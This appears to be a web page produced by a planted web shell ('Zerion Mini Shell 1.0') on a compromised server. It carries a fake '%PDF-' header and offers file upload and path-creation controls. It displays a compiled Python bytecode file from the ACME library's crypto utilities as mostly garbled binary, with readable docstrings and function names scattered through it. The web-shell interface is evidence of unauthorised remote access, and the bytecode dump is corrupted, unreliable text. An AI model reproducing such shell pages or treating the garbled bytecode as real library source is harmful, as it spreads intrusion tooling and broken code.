%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /lib/python3/dist-packages/acme/__pycache__/
Upload File :
Create Path :
Current File : //lib/python3/dist-packages/acme/__pycache__/crypto_util.cpython-312.pyc

�

M/�e�F��n�dZddlZddlZddlZddlZddlZddlZddlZddlm	Z	ddlm
Z
ddlmZddlmZddlm
Z
ddlmZdd	lmZdd
lmZddlmZddlZddlmZdd
lmZddlmZej2e�Zej8ZGd�d�ZGd�d�Zddeddfde de de!de!de!dee"e!fde
ee dejFfd�Z$			d4de d e
eee"ee"fd!e%d"e
eeejLejNfde f
d#�Z(d$eejFejRfdee"fd%�Z*d&eejFejRfdee"fd'�Z+d&eejFejRfdee"fd(�Z,d&eejFejRfdee"fd)�Z-					d5d*ej\d e
ee"d+e
e!d,e!d-e%d.e
eej^d/e
eeejLejNfdejFfd0�Z0ejbfd1eeejdeejFfd2e!de fd3�Z3y)6zCrypto utilities.�N)�Any)�Callable)�List)�Mapping)�Optional)�Sequence)�Set)�Tuple)�Union)�crypto)�SSL)�errorsc��eZdZdeeeejejfffd�Z	de
jdeeejejffd�Z
y)�_DefaultCertSelection�certsc��||_y�N)r)�selfrs  �2/usr/lib/python3/dist-packages/acme/crypto_util.py�__init__z_DefaultCertSelection.__init__&s	����
��
connection�returnc�`�|j�}|r|jj|d�Syr)�get_servernamer�get)rr�server_names   r�__call__z_DefaultCertSelection.__call__)s+�� �/�/�1����:�:�>�>�+�t�4�4�rN)�__name__�
__module__�__qualname__r�bytesr
r�PKey�X509rr
�
Connectionrr�rrrr%s[���g�e�U�6�;�;����3K�-L�&L�M���3�>�>��h�u�V�[�[�RX�R]�R]�E]�?^�6_�rrc�z�eZdZdZdeddfdej
deeee	e
je
jffde
deeej eegefdeeej gee	e
je
jffddfd	�Zd
edefd�Zdej ddfd
�ZGd�d�Zde	eeffd�Zy)�	SSLSocketa�SSL wrapper for sockets.

    :ivar socket sock: Original wrapped socket.
    :ivar dict certs: Mapping from domain names (`bytes`) to
        `OpenSSL.crypto.X509`.
    :ivar method: See `OpenSSL.SSL.Context` for allowed values.
    :ivar alpn_selection: Hook to select negotiated ALPN protocol for
        connection.
    :ivar cert_selection: Hook to select certificate for connection. If given,
        `certs` parameter would be ignored, and therefore must be empty.

    N�sockr�method�alpn_selection�cert_selectionrc��||_||_||_|s
|std��|r
|rtd��|}|�t	|r|ni�}||_y)Nz*Neither cert_selection or certs specified.z(Both cert_selection and certs specified.)r)r+r*�
ValueErrorrr,)rr)rr*r+r,�actual_cert_selections       rrzSSLSocket.__init__=sg����	�,�������e��I�J�J��e��G�H�H�Tb�	�!�(�$9�5�%�b�$Q�!�3��r�namec�.�t|j|�Sr)�getattrr)�rr0s  r�__getattr__zSSLSocket.__getattr__Ts���t�y�y�$�'�'rrc���|j|�}|�%tjd|j��y|\}}t	j
|j�}|jtj�|jtj�|j|�|j|�|j�|j|j�|j|�y)a�SNI certificate callback.

        This method will set a new OpenSSL context object for this
        connection when an incoming connection provides an SNI name
        (in order to serve the appropriate certificate, if any).

        :param connection: The TLS connection object on which the SNI
            extension was received.
        :type connection: :class:`OpenSSL.Connection`

        Nz=Certificate selection for server name %s failed, dropping SSL)r,�logger�debugrr
�Contextr*�set_options�OP_NO_SSLv2�OP_NO_SSLv3�use_privatekey�use_certificater+�set_alpn_select_callback�set_context)rr�pair�key�cert�new_contexts      r�_pick_certificate_cbzSSLSocket._pick_certificate_cbWs����"�"�:�.���<��L�L�X�#�2�2�4�
6���	��T��k�k�$�+�+�.��������0�������0��"�"�3�'��#�#�D�)����*��0�0��1D�1D�E����{�+rc�T�eZdZdZdej
ddfd�Zdedefd�Z	dede
fd	�Zy)
�SSLSocket.FakeConnectionzFake OpenSSL.SSL.Connection.rrNc��||_yr)�_wrapped)rrs  rrz!SSLSocket.FakeConnection.__init__ws	��&�D�Mrr0c�.�t|j|�Sr)r2rHr3s  rr4z$SSLSocket.FakeConnection.__getattr__zs���4�=�=�$�/�/r�unused_argsc��	|jj�S#tj$r}t	j
|��d}~wwxYwr)rH�shutdownr
�Error�socket�error)rrJrOs   rrLz!SSLSocket.FakeConnection.shutdown}s?��
*��}�}�-�-�/�/���9�9�
*�
�l�l�5�)�)��
*�s��A	�A�A	)rr r!�__doc__r
r%r�strrr4�boolrLr&rr�FakeConnectionrFrsB��*�	'�s�~�~�	'�$�	'�	0�C�	0�C�	0�		*��		*��		*rrSc���|jj�\}}	tj|j�}|jtj�|jtj�|j|j�|j�|j|j�|jtj||��}|j�tj!d|�	|j#�||fS#tj$$r}t'j(|��d}~wwxYw#|j+��xYw)NzPerforming handshake with %s)r)�acceptr
r8r*r9r:r;�set_tlsext_servername_callbackrDr+r>rSr%�set_accept_stater6r7�do_handshakerMrNrO�close)rr)�addr�context�ssl_sockrOs      rrUzSSLSocket.accept�s���Y�Y�%�%�'�
��d�	��k�k�$�+�+�.�G�������0�������0��2�2�4�3L�3L�M��"�"�.��0�0��1D�1D�E��*�*�3�>�>�'�4�+H�I�H��%�%�'�
�L�L�7��>�
*��%�%�'��T�>�!���9�9�
*��l�l�5�)�)��
*��	�
�J�J�L��s0�C*E�
D�E�E�1E�E�E�E!)rr r!rP�_DEFAULT_SSL_METHODrNrrr"r
rr#r$�intrr
r%rrrQrr4rDrSrUr&rrr(r(0s#���UY�2�\`�UY�
4�V�]�]�4� ����f�k�k�6�;�;�6N�0O�)O�!P�Q�4��4�"*�(�C�N�N�D��K�3P�RW�3W�*X�!Y�4�"*�(�C�N�N�3C�3;�E�&�+�+�BH�+�+�CN�=O�4P�4P�+Q�"R�	4��4�.(��(��(�,�s�~�~�,�$�,�6*�*�,��n�c�1�2�rr(i�i,)�rr0�host�port�timeoutr*�source_address�alpn_protocolsrc
��tj|�}|j|�d|i}	tj	d||t|�rdj
|d|d�nd�||f}	tj|	fi|��}
tj|
�5}tj||�}
|
j�|
j!|�|�|
j#|�	|
j%�|
j'�	ddd�
j)�}|sJ�|S#tj$r}tj|��d}~wwxYw#tj$r}tj|��d}~wwxYw#1swY�xYw)a	Probe SNI server for SSL certificate.

    :param bytes name: Byte string to send as the server name in the
        client hello message.
    :param bytes host: Host to connect to.
    :param int port: Port to connect to.
    :param int timeout: Timeout in seconds.
    :param method: See `OpenSSL.SSL.Context` for allowed values.
    :param tuple source_address: Enables multi-path probing (selection
        of source interface). See `socket.creation_connection` for more
        info. Available only in Python 2.7+.
    :param alpn_protocols: Protocols to request using ALPN.
    :type alpn_protocols: `Sequence` of `bytes`

    :raises acme.errors.Error: In case of any problems.

    :returns: SSL certificate presented by the server.
    :rtype: OpenSSL.crypto.X509

    rcz!Attempting to connect to %s:%d%s.z
 from {0}:{1}r�r_N)r
r8�set_timeoutr6r7�any�formatrN�create_connectionrOrrM�
contextlib�closingr%�set_connect_state�set_tlsext_host_name�set_alpn_protosrXrL�get_peer_certificate)r0r`rarbr*rcrdr[�
socket_kwargs�socket_tupler)rO�client�
client_sslrBs               r�	probe_sniru�sx��.�k�k�&�!�G����� �%�~�6�M�"����/��t��^�$�
�"�"��q�!��q�!�
�+-�	
�,0��,���'�'��F�
�F��
�	�	�D�	!�
&�V��^�^�G�V�4�
��$�$�&��'�'��-��%��&�&�~�6�	&��#�#�%����!�
&��*�*�,�D��K�4��K��!�<�<�"��l�l�5�!�!��"���y�y�	&��,�,�u�%�%��	&��
&�
&�sC�AD!�AF�" E�!E�4E	�	E�E>�$E9�9E>�>F�F
�private_key_pem�domains�must_staple�ipaddrsc���tjtj|�}tj�}g}|�g}|�g}t	|�t	|�zdk(rtd��|D]}|j
d|z��|D] }|j
d|jz��"dj|�jd�}	tjdd|	�	�g}
|r'|
j
tjd
dd�	��|j|
�|j|�|jd�|j|d�tjtj|�S)
a�Generate a CSR containing domains or IPs as subjectAltNames.

    :param buffer private_key_pem: Private key, in PEM PKCS#8 format.
    :param list domains: List of DNS names to include in subjectAltNames of CSR.
    :param bool must_staple: Whether to include the TLS Feature extension (aka
        OCSP Must Staple: https://tools.ietf.org/html/rfc7633).
    :param list ipaddrs: List of IPaddress(type ipaddress.IPv4Address or ipaddress.IPv6Address)
    names to include in subbjectAltNames of CSR.
    params ordered this way for backward competablity when called by positional argument.
    :returns: buffer PEM-encoded Certificate Signing Request.
    rzAAt least one of domains or ipaddrs parameter need to be not empty�DNS:�IP:�, �ascii�subjectAltNameF��critical�values1.3.6.1.5.5.7.1.24sDER:30:03:02:01:05�sha256)r�load_privatekey�FILETYPE_PEM�X509Req�lenr.�append�exploded�join�encode�
X509Extension�add_extensions�
set_pubkey�set_version�sign�dump_certificate_request)rvrwrxry�private_key�csr�sanlist�address�ips�
san_string�
extensionss           r�make_csrr��sa���(�(����_�.�K�
�.�.�
�C��G���������
�7�|�C��L� �A�%��\�]�]��)�����v��'�(�)��-�����u�s�|�|�+�,�-����7�#�*�*�7�3�J�	������	
��J�����&�.�.�!��'�)�	*����z�"��N�N�;���O�O�A���H�H�[�(�#��*�*����S�"�"r�loaded_cert_or_reqc��|j�j}t|�}|�|S|g|D�cgc]
}||k7s�	|��c}zScc}wr)�get_subject�CN�_pyopenssl_cert_or_req_san)r��common_name�sans�ds    r� _pyopenssl_cert_or_req_all_namesr�sP��%�0�0�2�5�5�K�%�&8�9�D������=�t�@�!�q�K�/?�A�@�@�@��@s
�
A�A�cert_or_reqc��d}d|z}t|�}|D�cgc]'}|j|�r|j|�d��)c}Scc}w)a�Get Subject Alternative Names from certificate or CSR using pyOpenSSL.

    .. todo:: Implement directly in PyOpenSSL!

    .. note:: Although this is `acme` internal API, it is used by
        `letsencrypt`.

    :param cert_or_req: Certificate or CSR.
    :type cert_or_req: `OpenSSL.crypto.X509` or `OpenSSL.crypto.X509Req`.

    :returns: A list of Subject Alternative Names that is DNS.
    :rtype: `list` of `str`

    �:�DNSrf)�_pyopenssl_extract_san_list_raw�
startswith�split�r��part_separator�prefix�
sans_parts�parts     rr�r�#sX��$�N�
�^�
#�F�0��=�J�#�?��d�o�o�f�&=�
�J�J�~�&�q�)�?�?��?s�,Ac��d}d|z}t|�}|D�cgc]"}|j|�s�|t|�d��$c}Scc}w)aeGet Subject Alternative Names IPs from certificate or CSR using pyOpenSSL.

    :param cert_or_req: Certificate or CSR.
    :type cert_or_req: `OpenSSL.crypto.X509` or `OpenSSL.crypto.X509Req`.

    :returns: A list of Subject Alternative Names that are IP Addresses.
    :rtype: `list` of `str`. note that this returns as string, not IPaddress object

    r�z
IP AddressN)r�r�r�r�s     r�_pyopenssl_cert_or_req_san_ipr�>sG���N�
�N�
*�F�0��=�J�+5�Q�4�����9P�D��V����Q�Q��Qs
�A�Ac��t|tj�r4tjtj|�jd�}n3tjtj|�jd�}tjd|�}d}|�g}|S|jd�j|�}|S)aGet raw SAN string from cert or csr, parse it as UTF-8 and return.

    :param cert_or_req: Certificate or CSR.
    :type cert_or_req: `OpenSSL.crypto.X509` or `OpenSSL.crypto.X509Req`.

    :returns: raw san strings, parsed byte as utf-8
    :rtype: `list` of `str`

    zutf-8z5X509v3 Subject Alternative Name:(?: critical)?\s*(.*)r}rf)�
isinstancerr$�dump_certificate�
FILETYPE_TEXT�decoder��re�search�groupr�)r��text�raw_san�parts_separatorr�s     rr�r�Rs����+�v�{�{�+��&�&�v�';�';�[�I�P�P�QX�Y���.�.�v�/C�/C�[�Q�X�X�Y`�a���i�i�P�RV�W�G��O����J���-4�M�M�!�,<�,B�,B�?�,S�J��rrA�
not_before�validity�	force_sanr�r�c	���|s	|sJd��tj�}|jtt	j
t
jd��d��|jd�|�g}|�g}|�g}|jtjddd��t|�dkDr|d|j�_
|j|j��g}|D]}	|jd|	z��|D] }
|jd	|
jz��"d
j!|�j#d�}|st|�dkDst|�dkDr'|jtjd
d|���|j%|�|j'|�dn|�|j)|�|j+|�|j-|d�|S)atGenerate new self-signed certificate.

    :type domains: `list` of `str`
    :param OpenSSL.crypto.PKey key:
    :param bool force_san:
    :param extensions: List of additional extensions to include in the cert.
    :type extensions: `list` of `OpenSSL.crypto.X509Extension`
    :type ips: `list` of (`ipaddress.IPv4Address` or `ipaddress.IPv6Address`)

    If more than one domain is provided, all of the domains are put into
    ``subjectAltName`` X.509 extension and first domain is set as the
    subject CN. If only one domain is provided no ``subjectAltName``
    extension is used, unless `force_san` is ``True``.

    z7Must provide one or more hostnames or IPs for the cert.��sbasicConstraintsTsCA:TRUE, pathlen:0rr{r|r}r~rfrFr�r�)rr$�set_serial_numberr^�binascii�hexlify�os�urandomr�r�r�r�r�r��
set_issuerr�r�r�r��gmtime_adj_notBefore�gmtime_adj_notAfterr�r�)rArwr�r�r�r�r�rBr�r��ipr�s            r�gen_ss_certr�qs���*�c�T�T�T�>��;�;�=�D����3�x�/�/��
�
�2��?��D�E����Q�����
�����
�{�����������'<�	>��
�7�|�a�� '��
�������O�O�D�$�$�&�'��G��)�����v��'�(�)��,�����u�r�{�{�*�+�,����7�#�*�*�7�3�J��C��L�1�$��C��1�����&�.�.����
�	�	���
�#����:�#5�a�:�F����X�&��O�O�C���I�I�c�8���Kr�chain�filetypec����dttjtjfdt
f�fd��dj
�fd�|D��S)z�Dump certificate chain into a bundle.

    :param list chain: List of `OpenSSL.crypto.X509` (or wrapped in
        :class:`josepy.util.ComparableX509`).

    :returns: certificate chain bundle
    :rtype: bytes

    rBrc����t|tj�rEt|jtj
�rt
jd��|j}t	j�|�S)NzUnexpected CSR provided.)	r��jose�ComparableX509�wrappedrr�rrMr�)rBr�s �r�
_dump_certz(dump_pyopenssl_chain.<locals>._dump_cert�sQ����d�D�/�/�0��$�,�,����7��l�l�#=�>�>��<�<�D��&�&�x��6�6rrc3�.�K�|]}�|����y�wrr&)�.0rBr�s  �r�	<genexpr>z'dump_pyopenssl_chain.<locals>.<genexpr>�s�����7��J�t�$�7�s�)rr�r�rr$r"r�)r�r�r�s `@r�dump_pyopenssl_chainr��sA���7��t�2�2�F�K�K�?�@�7�U�7��8�8�7��7�7�7r)NFN)NNi�:	TNN)4rPr�rk�	ipaddress�loggingr�r�rN�typingrrrrrrr	r
r�josepyr��OpenSSLrr
�acmer�	getLoggerrr6�
SSLv23_METHODr]rr(r"r^rQr$rurR�IPv4Address�IPv6Addressr�r�r�r�r�r�r#r�r�r�r�r�r&rr�<module>r�s��������	�	�
��������������	��	�	�8�	$���'�'����u�u�p58��/�SZ�:>�6�E�6��6�c�6�#�6��6�AF�s�C�x��6�&�x���7�6�CI�;�;�6�rVZ�!&�\`�4"�e�4"�h�u�S��X�t�C�y�=P�7Q�.R�4"��4"��t�E�)�*?�*?��AV�AV�*V�$W�X�Y�4"��4"�nA��v�{�{�F�N�N�?Z�9[�A�*.�s�)�A�?�E�&�+�+�v�~�~�2M�,N�?�SW�X[�S\�?�6R�u�V�[�[�&�.�.�5P�/Q�R�VZ�[^�V_�R�(��v�{�{�F�N�N�7R�1S��X\�]`�Xa��>BF�,0�FJ�CG�[_�	?�V�[�[�?�8�D��I�+>�?�$�S�M�?��?�?C�?�%�T�&�*>�*>�%?�@�?��d�5��)>�)>�	�@U�@U�)U�#V�W�X�	?�
�[�[�?�F*0�)<�)<�8��d�4�+>�+>�&?��f�k�k�AR�&R� S�8�#&�8�AF�8r

Zerion Mini Shell 1.0